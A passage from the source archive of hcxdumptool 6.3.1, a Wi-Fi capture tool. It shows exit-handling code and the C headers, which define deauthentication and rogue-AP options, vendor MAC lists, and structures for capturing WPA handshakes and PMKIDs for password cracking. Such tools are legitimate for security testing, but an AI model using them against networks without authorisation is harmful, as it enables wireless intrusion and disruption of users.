EXIT_ON_GPIOBUTTON) { fprintf(stdout, "\nexit on GPIO button\n"); if(exitgpiobuttonflag == EXIT_ACTION_REBOOT) { if(system("reboot") != 0) fprintf(stderr, "\ncan't reboot system\n"); } else if(exitgpiobuttonflag == EXIT_ACTION_POWEROFF) { if(system("poweroff") != 0) fprintf(stderr, "\ncan't power off\n"); } } else if((wanteventflag & EXIT_ON_TOT) == EXIT_ON_TOT) { fprintf(stdout, "\nexit on TOT\n"); if(exittotflag == EXIT_ACTION_REBOOT) { if(system("reboot") != 0) fprintf(stderr, "\ncan't reboot system\n"); } else if(exittotflag == EXIT_ACTION_POWEROFF) { if(system("poweroff") != 0) fprintf(stderr, "\ncan't power off\n"); } } else if((wanteventflag & EXIT_ON_WATCHDOG) == EXIT_ON_WATCHDOG) { fprintf(stdout, "\nexit on watchdog\n"); if(exitwatchdogflag == EXIT_ACTION_REBOOT) { if(system("reboot") != 0) fprintf(stderr, "\ncan't reboot system\n"); } else if(exitwatchdogflag == EXIT_ACTION_POWEROFF) { if(system("poweroff") != 0) fprintf(stderr, "\ncan't power off\n"); } } else if((wanteventflag & EXIT_ON_ERROR) == EXIT_ON_ERROR) { fprintf(stdout, "\nexit on error\n"); if(exiterrorflag == EXIT_ACTION_REBOOT) { if(system("reboot") != 0) fprintf(stderr, "\ncan't reboot system\n"); } else if(exiterrorflag == EXIT_ACTION_POWEROFF) { if(system("poweroff") != 0) fprintf(stderr, "\ncan't power off\n"); } } fprintf(stdout, "\nbye-bye\n\e[?25h"); return EXIT_SUCCESS; } /*===========================================================================*/ hcxdumptool-6.3.1/include/000077500000000000000000000000001444752163100155215ustar00rootroot00000000000000hcxdumptool-6.3.1/include/hcxdumptool.h000066400000000000000000000223261444752163100202450ustar00rootroot00000000000000/*===========================================================================*/ #define HCX_BPF 1 #define HCX_DISABLE_BEACON 2 #define HCX_DISABLE_DEAUTHENTICATION 3 #define HCX_DISABLE_PROBEREQUEST 4 #define HCX_DISABLE_ASSOCIATION 5 #define HCX_DISABLE_REASSOCIATION 6 #define HCX_BEACONTX_MAX 7 #define HCX_PROBERESPONSETX_MAX 8 #define HCX_GPIO_BUTTON 9 #define HCX_GPIO_STATUSLED 10 #define HCX_TOT 11 #define HCX_ERROR_MAX 12 #define HCX_WATCHDOG_MAX 13 #define HCX_ATTEMPT_CLIENT_MAX 14 #define HCX_ATTEMPT_AP_MAX 15 #define HCX_ON_SIGTERM 16 #define HCX_ON_TOT 17 #define HCX_ON_GPIOBUTTON 18 #define HCX_ON_WATCHDOG 19 #define HCX_ON_ERROR 20 #define HCX_ESSIDLIST 21 #define HCX_NMEA0183 22 #define HCX_GPSD 23 #define HCX_NMEA0183_OUT 24 #define HCX_NMEA0183_PCAPNG 25 #define HCX_RCASCAN 26 #define HCX_RD_SORT 27 #define HCX_IFNAME 'i' #define HCX_PCAPNGNAME 'w' #define HCX_INTERFACE_INFO 'I' #define HCX_SET_MONITORMODE 'm' #define HCX_SET_MONITORMODE_PASSIVE 'p' #define HCX_SET_SCANLIST_FROM_USER_CH 'c' #define HCX_SET_SCANLIST_FROM_USER_FREQ 'f' #define HCX_SET_SCANLIST_FROM_INTERFACE 'F' #define HCX_SHOW_INTERFACE_LIST 'L' #define HCX_HOLD_TIME 't' #define HCX_HELP 'h' #define HCX_VERSION 'v' /*---------------------------------------------------------------------------*/ #define EXIT_EVENT_MASK 0b00011111 #define EXIT_ON_SIGTERM 0b00000001 #define EXIT_ON_GPIOBUTTON 0b00000010 #define EXIT_ON_TOT 0b00000100 #define EXIT_ON_WATCHDOG 0b00001000 #define EXIT_ON_ERROR 0b00010000 #define EXIT_ACTION_REBOOT 0b00000001 #define EXIT_ACTION_POWEROFF 0b00000010 #define ERROR_MAX 100 #define WATCHDOG_MAX 600 #define ATTEMPTCLIENT_MAX 10 #define ATTEMPTAP_MAX 32 #define IFTYPENL 0b00000001 #define IFTYPEMON 0b00000010 #define IFTYPEMONACT 0b00000100 #define ETHTOOL_STD_LEN 32 #define TIMER_EPWAITND 100 #define TIMER1_VALUE_SEC 1L #define TIMER1_VALUE_NSEC 0L #define TIMER1_INTERVAL_SEC 1L #define TIMER1_INTERVAL_NSEC 0L #define TIMER_RCA_VALUE_SEC 0L #define TIMER_RCA_VALUE_NSEC 200000000L #define TIMER_RCA_INTERVAL_SEC 0L #define TIMER_RCA_INTERVAL_NSEC 200000000L #define TIMEHOLD 1000000000ULL #define TIMEBEACONNEW 3600000000000ULL #define TIMEAUTHWAIT 200000000ULL #define TIMEASSOCWAIT 200000000ULL #define TIMEREASSOCWAIT 200000000ULL #define EPOLL_EVENTS_MAX 5 #define APLIST_MAX 250 #define APRGLIST_MAX 500 #define CLIENTLIST_MAX 500 #define MACLIST_MAX 250 #define ESSID_MAX 32 #define PMKID_MAX 16 #define PSK_MAX 64 #define DRIVERNAME_MAX 32 #define EAPOLM2TIMEOUT 20000000ULL #define EAPOLM3TIMEOUT 20000000ULL #define BEACONTX_MAX 10 #define PROBERESPONSETX_MAX 10 #define PCAPNG_SNAPLEN 0xffff #define RTD_LEN 9128 #define TIMESTRING_LEN 128 #define WLTXBUFFER 256 #define NMEA_SIZE 9128 #define NMEA_MSG_MAX 128 #define NMEA_MIN 10 #define NMEA_GPRMC_MIN 56 #define NMEA_CS_CR_LF_SIZE 5 #define NMEA_GPWPLID_SIZE 6 #define NMEA_GPTXTID_SIZE 6 +1 #define NLTX_SIZE 0xfff #define NLRX_SIZE 0xffff #define WEAKCANDIDATEDEF "12345678" /*===========================================================================*/ typedef struct { u8 status; u8 macap[6]; u8 kdv1; u64 replaycountm1; u8 noncem1[4]; u8 kdv2; u64 replaycountm2; }authseqakt_t; #define AUTHSEQAKT_SIZE (sizeof(authseqakt_t)) /*---------------------------------------------------------------------------*/ typedef struct __attribute__((__packed__)) { u8 len; u8 *essid; }essid_t; #define ESSID_SIZE (sizeof(essid_t)) /*---------------------------------------------------------------------------*/ typedef struct __attribute__((__packed__)) { #define APIE_ESSID 0b0000000000000001 #define APGS_CCMP 0b0000000000000010 #define APGS_TKIP 0b0000000000000100 #define APCS_CCMP 0b0000000000001000 #define APCS_TKIP 0b0000000000010000 #define APRSNAKM_PSK 0b0000000000100000 #define APRSNAKM_PSK256 0b0000000001000000 #define APRSNAKM_PSKFT 0b0000000010000000 #define APWPAAKM_PSK 0b0000000100000000 #define APAKM_MASK 0b0000000111100000 #define AP_MFP 0b0000001000000000 u8 flags; u8 essidlen; u8 essid[ESSID_MAX]; u16 channel; }infoelement_t; #define INFOELEMENT_SIZE (sizeof(infoelement_t)) /*---------------------------------------------------------------------------*/ typedef struct __attribute__((__packed__)) { u64 tsakt; u64 tshold1; u64 tsauth; u32 count; u8 macap[6]; u8 macclient[6]; u8 status; #define AP_IN_RANGE_TOT 120000000000ULL #define AP_IN_RANGE 0b00000001 #define AP_IN_RANGE_MASK 0b11111110 #define AP_ESSID 0b00000010 #define AP_BEACON 0b00000100 #define AP_PROBERESPONSE 0b00001000 #define AP_EAPOL_M1 0b00010000 #define AP_EAPOL_M2 0b00100000 #define AP_EAPOL_M3 0b01000000 #define AP_PMKID 0b10000000 #define AP_PMKID_EAPOL 0b11000000 infoelement_t ie; }aplist_t; #define APLIST_SIZE (sizeof(aplist_t)) /*---------------------------------------------------------------------------*/ static int sort_aplist_by_tsakt(const void *a, const void *b) { const aplist_t *ai = (const aplist_t *)a; const aplist_t *bi = (const aplist_t *)b; if(ai->tsakt < bi->tsakt) return 1; else if(ai->tsakt > bi->tsakt) return -1; return 0; } /*---------------------------------------------------------------------------*/ #ifdef STATUSOUT static int sort_aplist_by_status(const void *a, const void *b) { const aplist_t *ai = (const aplist_t *)a; const aplist_t *bi = (const aplist_t *)b; if(ai->status < bi->status) return 1; else if(ai->status > bi->status) return -1; if(ai->tsakt < bi->tsakt) return 1; else if(ai->tsakt > bi->tsakt) return -1; return 0; } #endif /*---------------------------------------------------------------------------*/ typedef struct __attribute__((__packed__)) { u64 tsakt; u8 macaprg[6]; u8 essidlen; u8 essid[ESSID_MAX]; }aprglist_t; #define APRGLIST_SIZE (sizeof(aprglist_t)) static int sort_aprglist_by_tsakt(const void *a, const void *b) { const aprglist_t *ai = (const aprglist_t *)a; const aprglist_t *bi = (const aprglist_t *)b; if(ai->tsakt < bi->tsakt) return 1; else if(ai->tsakt > bi->tsakt) return -1; return 0; } /*---------------------------------------------------------------------------*/ typedef struct __attribute__((__packed__)) { u64 tsakt; u64 tsauth; u64 tsassoc; u64 tsreassoc; u16 aid; u8 macclient[6]; u8 macap[6]; u8 mic[4]; #define CLIENT_EAP_START 0b00000001 #define CLIENT_EAPOL_M2 0b00000010 u8 status; u32 count; infoelement_t ie; }clientlist_t; #define CLIENTLIST_SIZE (sizeof(clientlist_t)) /*---------------------------------------------------------------------------*/ static int sort_clientlist_by_tsakt(const void *a, const void *b) { const clientlist_t *ai = (const clientlist_t *)a; const clientlist_t *bi = (const clientlist_t *)b; if(ai->tsakt < bi->tsakt) return 1; else if(ai->tsakt > bi->tsakt) return -1; return 0; } /*---------------------------------------------------------------------------*/ #ifdef STATUSOUT static int sort_clientlist_by_status(const void *a, const void *b) { const clientlist_t *ai = (const clientlist_t *)a; const clientlist_t *bi = (const clientlist_t *)b; if(ai->status < bi->status) return 1; else if(ai->status > bi->status) return -1; if(ai->tsakt < bi->tsakt) return 1; else if(ai->tsakt > bi->tsakt) return -1; return 0; } #endif /*---------------------------------------------------------------------------*/ typedef struct __attribute__((__packed__)) { u64 tsakt; u8 mac[6]; }maclist_t; #define MACLIST_SIZE (sizeof(maclist_t)) static int sort_maclist_by_tsakt(const void *a, const void *b) { const maclist_t *ai = (const maclist_t *)a; const maclist_t *bi = (const maclist_t *)b; if(ai->tsakt < bi->tsakt) return 1; else if(ai->tsakt > bi->tsakt) return -1; return 0; } /*---------------------------------------------------------------------------*/ #define SCANLIST_MAX 512 #define FREQUENCYLIST_MAX 256 typedef struct __attribute__((__packed__)) { u32 frequency; u32 channel; u32 pwr; #define IF_STAT_FREQ_DISABLED 0b00000001 u8 status; }frequencylist_t; #define FREQUENCYLIST_SIZE (sizeof(frequencylist_t)) /*---------------------------------------------------------------------------*/ #define INTERFACELIST_MAX 64 typedef struct __attribute__((__packed__)) { int index; u32 wiphy; #define IF_HAS_NETLINK 0b00000001 #define IF_HAS_MONITOR 0b00000010 #define IF_HAS_MONITOR_ACTIVE 0b00000100 #define IF_HAS_NLMON 0b00000011 #define IF_HAS_NLMON_ACTIVE 0b00000111 u8 type; #define IF_STAT_MONITOR 0b00000001 #define IF_STAT_UP 0b00000010 #define IF_STAT_OK 0b00000011 u8 status; u8 hwmac[6]; u8 vimac[6]; char name[IFNAMSIZ]; char driver[DRIVERNAME_MAX]; size_t i; frequencylist_t *frequencylist; }interface_t; #define INTERFACELIST_SIZE (sizeof(interface_t)) static int sort_interfacelist_by_index(const void *a, const void *b) { const interface_t *ia = (const interface_t *)a; const interface_t *ib = (const interface_t *)b; if(ia->index > ib->index) return 1; else if(ia->index < ib->index) return -1; return 0; } /*===========================================================================*/ typedef struct { struct nlmsghdr nlh; struct ifinfomsg ifinfo; char attrbuf[512]; }req_t; /*===========================================================================*/ static bool read_bpf(char *bpfname); static inline bool nl_set_frequency(); /*===========================================================================*/ hcxdumptool-6.3.1/include/ieee80211.h000066400000000000000000000320551444752163100172020ustar00rootroot00000000000000/*===========================================================================*/ #define MAC_SIZE_ACK (10) #define MAC_SIZE_RTS (16) #define MAC_SIZE_NORM (24) #define MAC_SIZE_QOS (26) #define MAC_SIZE_LONG (30) #define MAC_SIZE_QOS_LONG (32) #define FCS_LEN 4 /* types */ #define IEEE80211_FTYPE_MGMT 0x0 #define IEEE80211_FTYPE_CTL 0x1 #define IEEE80211_FTYPE_DATA 0x2 #define IEEE80211_FTYPE_RCVD 0x3 /* management */ #define IEEE80211_STYPE_ASSOC_REQ 0x0 #define IEEE80211_STYPE_ASSOC_RESP 0x1 #define IEEE80211_STYPE_REASSOC_REQ 0x2 #define IEEE80211_STYPE_REASSOC_RESP 0x3 #define IEEE80211_STYPE_PROBE_REQ 0x4 #define IEEE80211_STYPE_PROBE_RESP 0x5 #define IEEE80211_STYPE_BEACON 0x8 #define IEEE80211_STYPE_ATIM 0x9 #define IEEE80211_STYPE_DISASSOC 0xa #define IEEE80211_STYPE_AUTH 0xb #define IEEE80211_STYPE_DEAUTH 0xc #define IEEE80211_STYPE_ACTION 0xd #define IEEE80211_STYPE_NACK 0xe #define IEEE80211_STYPE_MGTRESERVED 0xf /* control */ #define IEEE80211_STYPE_VHT 0x5 #define IEEE80211_STYPE_CTL_EXT 0x6 #define IEEE80211_STYPE_BACK_REQ 0x8 #define IEEE80211_STYPE_BACK 0x9 #define IEEE80211_STYPE_PSPOLL 0xa #define IEEE80211_STYPE_RTS 0xb #define IEEE80211_STYPE_CTS 0xc #define IEEE80211_STYPE_ACK 0xd #define IEEE80211_STYPE_CFEND 0xe #define IEEE80211_STYPE_CFENDACK 0xf /* data */ #define IEEE80211_STYPE_DATA 0x0 #define IEEE80211_STYPE_DATA_CFACK 0x1 #define IEEE80211_STYPE_DATA_CFPOLL 0x2 #define IEEE80211_STYPE_DATA_CFACKPOLL 0x3 #define IEEE80211_STYPE_NULLFUNC 0x4 #define IEEE80211_STYPE_CFACK 0x5 #define IEEE80211_STYPE_CFPOLL 0x6 #define IEEE80211_STYPE_CFACKPOLL 0x7 #define IEEE80211_STYPE_QOS_DATA 0x8 #define IEEE80211_STYPE_QOS_DATA_CFACK 0x9 #define IEEE80211_STYPE_QOS_DATA_CFPOLL 0xa #define IEEE80211_STYPE_QOS_DATA_CFACKPOLL 0xb #define IEEE80211_STYPE_QOS_NULLFUNC 0xc #define IEEE80211_STYPE_QOS_CFACK 0xd #define IEEE80211_STYPE_QOS_CFPOLL 0xe #define IEEE80211_STYPE_QOS_CFACKPOLL 0xf /* Reason codes (IEEE 802.11-2007, 7.3.1.7, Table 7-22) */ #define WLAN_REASON_UNSPECIFIED 1 /* ok */ #define WLAN_REASON_PREV_AUTH_NOT_VALID 2 #define WLAN_REASON_DEAUTH_LEAVING 3 #define WLAN_REASON_DISASSOC_DUE_TO_INACTIVITY 4 #define WLAN_REASON_DISASSOC_AP_BUSY 5 #define WLAN_REASON_CLASS2_FRAME_FROM_NONAUTH_STA 6 /* ok */ #define WLAN_REASON_CLASS3_FRAME_FROM_NONASSOC_STA 7 /* ok */ #define WLAN_REASON_DISASSOC_STA_HAS_LEFT 8 #define WLAN_REASON_STA_REQ_ASSOC_WITHOUT_AUTH 9 /* IEEE 802.11h */ #define WLAN_REASON_PWR_CAPABILITY_NOT_VALID 10 #define WLAN_REASON_SUPPORTED_CHANNEL_NOT_VALID 11 /* IEEE 802.11i */ #define WLAN_REASON_INVALID_IE 13 #define WLAN_REASON_MICHAEL_MIC_FAILURE 14 #define WLAN_REASON_4WAY_HANDSHAKE_TIMEOUT 15 #define WLAN_REASON_GROUP_KEY_UPDATE_TIMEOUT 16 #define WLAN_REASON_IE_IN_4WAY_DIFFERS 17 #define WLAN_REASON_GROUP_CIPHER_NOT_VALID 18 #define WLAN_REASON_PAIRWISE_CIPHER_NOT_VALID 19 #define WLAN_REASON_AKMP_NOT_VALID 20 #define WLAN_REASON_UNSUPPORTED_RSN_IE_VERSION 21 #define WLAN_REASON_INVALID_RSN_IE_CAPAB 22 #define WLAN_REASON_IEEE_802_1X_AUTH_FAILED 23 #define WLAN_REASON_CIPHER_SUITE_REJECTED 24 #define IEEE80211_SEQ_SEQ_MASK 0xfff0 #define IEEE80211_SEQ_SEQ_SHIFT 4 #define WBIT(n) (1 << (n)) #define WPA_KEY_INFO_TYPE_MASK (WBIT(0) | WBIT(1) | WBIT(2)) #define WPA_KEY_INFO_TYPE_HMAC_MD5_RC4 WBIT(0) #define WPA_KEY_INFO_TYPE_HMAC_SHA1_AES WBIT(1) #define WPA_KEY_INFO_KEY_TYPE WBIT(3) /* 1 = Pairwise, 0 = Group key */ #define WPA_KEY_INFO_KEY_INDEX_MASK (WBIT(4) | WBIT(5)) #define WPA_KEY_INFO_KEY_INDEX_SHIFT 4 #define WPA_KEY_INFO_INSTALL WBIT(6) /* pairwise */ #define WPA_KEY_INFO_TXRX WBIT(6) /* group */ #define WPA_KEY_INFO_ACK WBIT(7) #define WPA_KEY_INFO_MIC WBIT(8) #define WPA_KEY_INFO_SECURE WBIT(9) #define WPA_KEY_INFO_ERROR WBIT(10) #define WPA_KEY_INFO_REQUEST WBIT(11) #define WPA_KEY_INFO_ENCR_KEY_DATA WBIT(12) /* IEEE 802.11i/RSN only */ /*---------------------------------------------------------------------------*/ typedef struct __attribute__((packed)) { u64 timestamp; u16 beacon_interval; u16 capability; u8 ie[0]; }ieee80211_beacon_proberesponse_t; #define IEEE80211_BEACON_SIZE offsetof(ieee80211_beacon_proberesponse_t, ie) #define IEEE80211_PROBERESPONSE_SIZE offsetof(ieee80211_beacon_proberesponse_t, ie) /*---------------------------------------------------------------------------*/ typedef struct __attribute__((packed)) { u8 ie[0]; }ieee80211_proberequest_t; #define IEEE80211_PROBEREQUEST_SIZE offsetof(ieee80211_proberequest_t, ie) /*===========================================================================*/ typedef struct __attribute__((__packed__)) { u8 category; #define RADIO_MEASUREMENT 5 u8 code; #define NEIGHBOR_REPORT_REQUEST 4 u8 dialog; u8 ie[0]; }ieee80211_action_t; #define IEEE80211_ACTION_SIZE offsetof(ieee80211_action_t, ie) /*---------------------------------------------------------------------------*/ typedef struct __attribute__((__packed__)) { #define OPEN_SYSTEM 0 u16 algorithm; u16 sequence; u16 status; u8 ie[0]; }ieee80211_auth_t; #define IEEE80211_AUTH_SIZE offsetof(ieee80211_auth_t, ie) /*---------------------------------------------------------------------------*/ typedef struct __attribute__((__packed__)) { u16 capability; u16 status; u16 aid; u8 ie[0]; }ieee80211_assoc_or_reassoc_resp_t; #define IEEE80211_ASSOCIATIONRESPONSE_SIZE offsetof(ieee80211_assoc_or_reassoc_resp_t, ie) #define IEEE80211_REASSOCIATIONRESPONSE_SIZE offsetof(ieee80211_assoc_or_reassoc_resp_t, ie) /*---------------------------------------------------------------------------*/ typedef struct __attribute__((__packed__)) { u16 capability; u16 listen_interval; u8 ie[0]; }ieee80211_assoc_req_t; #define IEEE80211_ASSOCIATIONREQUEST_SIZE offsetof(ieee80211_assoc_req_t, ie) /*---------------------------------------------------------------------------*/ typedef struct __attribute__((__packed__)) { u16 capability; u16 listen_interval; u8 current_macap[ETH_ALEN]; u8 ie[0]; }ieee80211_reassoc_req_t; #define IEEE80211_REASSOCIATIONREQUEST_SIZE offsetof(ieee80211_reassoc_req_t, ie) /*---------------------------------------------------------------------------*/ typedef struct __attribute__((__packed__)) { u8 id; #define TAG_SSID 0x00 #define TAG_RATE 0x01 #define TAG_CHAN 0x03 #define TAG_COUNTRY 0x07 #define TAG_RSN 0x30 #define TAG_PAG 0xde #define TAG_VENDOR 0xdd u8 len; u8 ie[0]; }ieee80211_ietag_t; #define IEEE80211_IETAG_SIZE offsetof(ieee80211_ietag_t, ie) /*---------------------------------------------------------------------------*/ typedef struct __attribute__((__packed__)) { u8 control; u8 flags; }ieee80211_qos_t; #define IEEE80211_QOS_SIZE (sizeof(ieee80211_qos_t)) /*---------------------------------------------------------------------------*/ typedef struct __attribute__((__packed__)) { u8 dsap; u8 ssap; u8 control; u8 org[3]; u16 type; #define LLC_TYPE_AUTH 0x888e #define LLC_TYPE_IPV4 0x0800 #define LLC_TYPE_IPV6 0x86dd #define LLC_TYPE_PREAUT 0x88c7 #define LLC_TYPE_FRRR 0x890d }ieee80211_llc_t; #define IEEE80211_LLC_SIZE (sizeof(ieee80211_llc_t)) #define IEEE80211_LLC_SNAP 0xaa /*---------------------------------------------------------------------------*/ typedef struct __attribute__((__packed__)) { u8 version; u8 type; #define EAP_PACKET 0 #define EAPOL_START 1 #define EAPOL_LOGOFF 2 #define EAPOL_KEY 3 #define EAPOL_ASF 4 #define EAPOL_MKA 5 u16 len; u8 data[0]; }ieee80211_eapauth_t; #define IEEE80211_EAPAUTH_SIZE offsetof(ieee80211_eapauth_t, data) /*---------------------------------------------------------------------------*/ #define M1 1 #define M2 2 #define M3 3 #define M4 4 typedef struct __attribute__((__packed__)) { u8 keydescriptor; u16 keyinfo; u16 keylen; u64 replaycount; u8 nonce[32]; u8 keyiv[16]; u64 keyrsc; u8 keyid[8]; u8 keymic[16]; u16 wpadatalen; u8 data[0]; }ieee80211_wpakey_t; #define IEEE80211_WPAKEY_SIZE offsetof(ieee80211_wpakey_t, data) /*---------------------------------------------------------------------------*/ typedef struct __attribute__((__packed__)) { u8 id; u8 len; u8 oui[3]; u8 type; #define PMKID_KDE 4 u8 pmkid[16]; }ieee80211_pmkid_t; #define IEEE80211_PMKID_SIZE (sizeof(ieee80211_pmkid_t)) /*---------------------------------------------------------------------------*/ typedef struct __attribute__((__packed__)) { u16 version; }ieee80211_rsnie_t; #define IEEE80211_RSNIE_SIZE sizeof(ieee80211_rsnie_t) #define IEEE80211_RSNIE_LEN_MIN 20 /*---------------------------------------------------------------------------*/ typedef struct __attribute__((__packed__)) { u8 oui[3]; #define RSN_CS_WEP 1 #define RSN_CS_TKIP 2 #define RSN_CS_WRAP 3 #define RSN_CS_CCMP 4 #define RSN_CS_WEP104 5 #define RSN_AKM_PSK 2 #define RSN_AKM_PSKFT 4 #define RSN_AKM_PSK256 6 u8 type; }ieee80211_rnsuite_t; #define IEEE80211_RSNSUITE_SIZE sizeof(ieee80211_rnsuite_t) /*---------------------------------------------------------------------------*/ typedef struct __attribute__((__packed__)) { u16 count; }ieee80211_rsnsuitecount_t; #define IEEE80211_RSNSUITECOUNT_SIZE sizeof(ieee80211_rsnsuitecount_t) /*---------------------------------------------------------------------------*/ typedef struct __attribute__((__packed__)) { #define MFP_REQUIRED 0b0000000001000000 u16 capability; }ieee80211_rsncapability_t; #define IEEE80211_RSNCAPABILITY_SIZE sizeof(ieee80211_rsncapability_t) /*---------------------------------------------------------------------------*/ typedef struct __attribute__((__packed__)) { u8 oui[3]; u8 type; u16 version; }ieee80211_wpaie_t; #define IEEE80211_WPAIE_SIZE sizeof(ieee80211_wpaie_t) #define IEEE80211_WPAIE_LEN_MIN 22 /*---------------------------------------------------------------------------*/ typedef struct __attribute__((__packed__)) { u8 oui[3]; #define WPA_CS_TKIP 2 #define WPA_CS_CCMP 4 #define WPA_AKM_PSK 2 u8 type; }ieee80211_wpasuite_t; #define IEEE80211_WPASUITE_SIZE sizeof(ieee80211_wpasuite_t) /*---------------------------------------------------------------------------*/ typedef struct __attribute__((__packed__)) { u16 count; }ieee80211_wpasuitecount_t; #define IEEE80211_WPASUITECOUNT_SIZE sizeof(ieee80211_wpasuitecount_t) /*===========================================================================*/ /* DS bit usage * * TA = transmitter address * RA = receiver address * DA = destination address * SA = source address * * ToDS FromDS A1(RA) A2(TA) A3 A4 Use * ----------------------------------------------------------------- * 0 0 DA SA BSSID - IBSS/DLS * 0 1 DA BSSID SA - AP -> STA * 1 0 BSSID SA DA - AP <- STA * 1 1 RA TA DA SA unspecified (WDS) */ typedef struct __attribute__((__packed__)) { #ifdef BIG_ENDIAN_HOST unsigned subtype : 4; unsigned type : 2; unsigned version : 2; unsigned ordered : 1; unsigned prot : 1; unsigned more_data : 1; unsigned power : 1; unsigned retry : 1; unsigned more_frag : 1; unsigned from_ds : 1; unsigned to_ds : 1; #else unsigned version : 2; unsigned type : 2; unsigned subtype : 4; unsigned to_ds : 1; unsigned from_ds : 1; unsigned more_frag : 1; unsigned retry : 1; unsigned power : 1; unsigned more_data : 1; unsigned prot : 1; unsigned ordered : 1; #endif u16 duration; u8 addr1[6]; u8 addr2[6]; u8 addr3[6]; u16 sequence; u8 addr4[6]; ieee80211_qos_t qos; }ieee80211_mac_t; /*===========================================================================*/ static const u8 zeroed[] = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 }; static const u8 macbc[] = { 0xff, 0xff, 0xff, 0xff, 0xff, 0xff }; static const u8 rsnsuiteoui[3] = { 0x00, 0x0f, 0xac }; static const u8 wpasuiteoui[3] = { 0x00, 0x50, 0xf2 }; static const int vendoraprg[] = { 0x00006c, 0x000101, 0x00054f, 0x000578, 0x000b18, 0x000bf4, 0x000c53, 0x000d58, 0x000da7, 0x000dc2, 0x000df2, 0x000e17, 0x000e22, 0x000e2a, 0x000eef, 0x000f09, 0x0016b4, 0x001761, 0x001825, 0x002067, 0x00221c, 0x0022f1, 0x00234a, 0x00238c, 0x0023f7, 0x002419, 0x0024fb, 0x00259d, 0x0025df, 0x00269f, 0x005047, 0x005079, 0x0050c7, 0x0084ed, 0x0086a0, 0x00a054, 0x00a085, 0x00bb3a, 0x00cb00, 0x0418b6, 0x0c8112, 0x100000, 0x10ae60, 0x10b713, 0x1100aa, 0x111111, 0x140708, 0x146e0a, 0x18421d, 0x1cf4ca, 0x205b2a, 0x20d160, 0x24336c, 0x24bf74, 0x28ef01, 0x3cb87a, 0x487604, 0x48f317, 0x50e14a, 0x544e45, 0x580943, 0x586ed6, 0x5c6b4f, 0x609620, 0x68e166, 0x706f81, 0x78f944, 0x7ce4aa, 0x8c8401, 0x8ce748, 0x906f18, 0x980ee4, 0x9c93e4, 0xa468bc }; #define VENDORAPRG_SIZE sizeof(vendoraprg) static const int vendorclientrg[] = { 0xa4a6a9, 0xacde48, 0xb025aa, 0xb0ece1, 0xb0febd, 0xb4e1eb, 0xc02250, 0xc8aacc, 0xd85dfb, 0xdc7014, 0xe00db9, 0xe0cb1d, 0xe80410, 0xf04f7c, 0xf0a225, 0xfcc233 }; #define VENDORCLIENTRG_SIZE sizeof(vendorclientrg) /*===========================================================================*/ hcxdumptool-6.3.1/include/pcapng.h000066400000000000000000000112571444752163100171500ustar00rootroot00000000000000/*===========================================================================*/ #define PCAPMAGICNUMBER 0xa1b2c3d4 #define PCAPMAGICNUMBERBE 0xd4c3b2a1 #define PCAPNGBLOCKTYPE 0x0a0d0d0a #define PCAPNGMAGICNUMBER 0x1a2b3c4d #define PCAPNGMAGICNUMBERBE 0x4d3c2b1a #define PCAPNG_MAJOR_VER 1 #define PCAPNG_MINOR_VER 0 #define PCAPNG_BLOCK_SIZE 2048 #define SHB_SYSINFO_LEN 256 /*===========================================================================*/ /* Header of all pcapng options */ typedef struct __attribute__((__packed__)) { #define SHB_EOC 0 #define SHB_COMMENT 1 #define SHB_HARDWARE 2 #define SHB_OS 3 #define SHB_USER_APPL 4 #define SHB_CUSTOM_OPT 0x0bad #define IF_NAME 2 #define IF_DESCRIPTION 3 #define IF_MACADDR 6 #define IF_TSRESOL 9 #define IF_TZONE 10 #define TSRESOL_USEC 6 #define TSRESOL_NSEC 9 /* custom option code */ #define OPTIONCODE_MACORIG 0xf29a #define OPTIONCODE_MACAP 0xf29b #define OPTIONCODE_RC 0xf29c #define OPTIONCODE_ANONCE 0xf29d #define OPTIONCODE_MACCLIENT 0xf29e #define OPTIONCODE_SNONCE 0xf29f #define OPTIONCODE_WEAKCANDIDATE 0xf2a0 #define OPTIONCODE_NMEA 0xf2a1 u16 option_code; /* option code - depending of block (0 - end of opts, 1 - comment are in common) */ u16 option_length; /* option length - length of option in bytes (will be padded to 32bit) */ char option_data[1]; }option_header_t; #define OH_SIZE offsetof(option_header_t, option_data) /*===========================================================================*/ /* Option Field */ typedef struct __attribute__((__packed__)) { u16 option_code; u16 option_length; u64 option_value; }optionfield64_t; #define OPTIONFIELD64_SIZE (sizeof(optionfield64_t)) /*===========================================================================*/ /* total length*/ typedef struct __attribute__((__packed__)) { u32 total_length; }total_length_t; #define TOTAL_SIZE (sizeof(total_length_t)) /*===========================================================================*/ /* Section Header Block (SHB) - ID 0x0A0D0D0A */ typedef struct __attribute__((__packed__)) { u32 block_type; /* block type */ u32 total_length; /* block length */ u32 byte_order_magic; /* byte order magic - indicates swapped data */ u16 major_version; /* major version of pcapng (1 atm) */ u16 minor_version; /* minor version of pcapng (0 atm) */ s64 section_length; /* length of section - can be -1 (parsing necessary) */ }section_header_block_t; #define SHB_SIZE (sizeof(section_header_block_t)) /*---------------------------------------------------------------------------*/ /* Interface Description Block (IDB) - ID 0x00000001 */ typedef struct __attribute__((__packed__)) { u32 block_type; /* block type */ #define IDBID 0x00000001 u32 total_length; /* block length */ u16 linktype; /* the link layer type (was -network- in classic pcap global header) */ u16 reserved; /* 2 bytes of reserved data */ u32 snaplen; /* maximum number of bytes dumped from each packet (was -snaplen- in classic pcap global header */ }interface_description_block_t; #define IDB_SIZE (sizeof(interface_description_block_t)) /*---------------------------------------------------------------------------*/ /* Custom Block (CB) - ID 0x00000bad */ typedef struct __attribute__((__packed__)) { u32 block_type; /* block type */ #define CBID 0x00000bad u32 total_length; /* block length */ u8 pen[4]; /* Private Enterprise Number */ u8 hcxm[32]; /* hcxdumptool magic number */ u8 data[1]; }custom_block_t; #define CB_SIZE offsetof (custom_block_t, data) /*---------------------------------------------------------------------------*/ /* Enhanced Packet Block (EPB) - ID 0x00000006 */ typedef struct __attribute__((__packed__)) { #define EPBID 0x00000006 u32 block_type; /* block type */ u32 total_length; /* block length */ u32 interface_id; /* the 